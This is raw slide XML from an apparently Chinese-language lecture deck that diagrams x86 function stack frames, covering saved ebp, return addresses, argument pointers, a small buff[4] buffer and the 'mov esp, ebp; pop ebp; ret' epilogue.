          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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8629" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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8630" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833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8631" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68632" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="68619" idx="3"/>
            <a:endCxn id="68620" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>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68633" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68634" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="68633" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68635" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2284413"/>
            <a:ext cx="304800" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68636" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1903413"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68637" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="68638" idx="3"/>
            <a:endCxn id="68622" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4632325" y="6064250"/>
            <a:ext cx="396875" cy="158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8638" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5881688"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68639" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="68640" idx="3"/>
            <a:endCxn id="68638" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3717925" y="6051550"/>
            <a:ext cx="320675" cy="1428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8640" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="5867400"/>
            <a:ext cx="593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esp</a:t>
            </a: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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155977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2673F-4C84-4669-A9C2-3466516FA65E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串数据基本概念</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9C7EA0-BB38-49B2-B712-08B22CEE8245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C5822FB-2A1C-4CE0-B053-A8D58C991837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="2348880"/>
            <a:ext cx="3170195" cy="2766300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4207424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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69637" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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69638" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69639" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="40671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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69640" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69641" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69642" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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69643" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69644" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="55911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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69645" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69646" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59118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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69647" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="25590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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69648" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69649" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="48910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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69650" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69651" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="69635" idx="3"/>
            <a:endCxn id="69640" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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69652" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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9653" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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9654" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833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9655" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69656" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="69643" idx="3"/>
            <a:endCxn id="69644" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>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69657" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69658" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="69657" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69659" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2514600"/>
            <a:ext cx="304800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69660" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2133600"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69661" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="69662" idx="3"/>
            <a:endCxn id="69645" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4632325" y="6356350"/>
            <a:ext cx="396875" cy="127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9662" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="6172200"/>
            <a:ext cx="593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algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69663" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="3200400"/>
            <a:ext cx="3124200" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恢复</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7514448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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70660" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70661" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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70662" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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f() argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70663" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="4067175"/>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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
